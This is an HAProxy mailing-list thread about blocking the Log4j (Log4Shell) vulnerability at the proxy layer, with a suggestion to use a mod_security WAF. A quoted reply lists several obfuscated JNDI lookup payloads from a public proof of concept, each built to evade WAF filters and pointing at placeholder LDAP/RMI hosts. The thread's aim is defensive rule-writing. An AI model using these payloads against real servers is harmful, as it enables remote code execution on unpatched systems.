You should also take into account path that can have base64 encoded payload.
To me the best bet for protecting via haproxy is using spoa mod_security WAF given people have already come with a comprehensive protection rules. Get Outlook for Android<https://aka.ms/AAb9ysg> ________________________________ From: Nicolas CARPi <nicola...@rpi.ooo> Sent: Tuesday, 14 December 2021, 10:27 To: Jonathan Matthews Cc: Olivier D; HAProxy Subject: Re: Blocking log4j CVE with HAProxy On 13 Dec, Jonathan Matthews wrote: > I believe there are string casing operators available, leading to > options like "${j{$lower:N}di:ldap://...";. Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} ${jndi:rmi://adsasd.asdasd.asdasd} ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} So if one can manage to match all of that, it could work. Of course this block in the POC is immediatly followed by: Don't trust the web application firewall. ;) [0] https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce#bypass-waf Best, ~Nico [https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F00000DRM7G&oid=00D90000000absk&lastMod=1526270984000] Know Your Customer due diligence on demand, powered by intelligent process automation Blogs<https://www.encompasscorporation.com/blog/> | LinkedIn<https://www.linkedin.com/company/encompass-corporation/> | Twitter<https://twitter.com/EncompassCorp> Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 Bothwell Street, Glasgow, UK, G2 6NL Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 Clarence Street, Sydney, New South Wales, 2000 This email and any attachments is intended only for the use of the individual or entity named above and may contain confidential information If you are not the intended recipient, any dissemination, distribution or copying of this email is prohibited. If received in error, please notify us immediately by return email and destroy the original message.
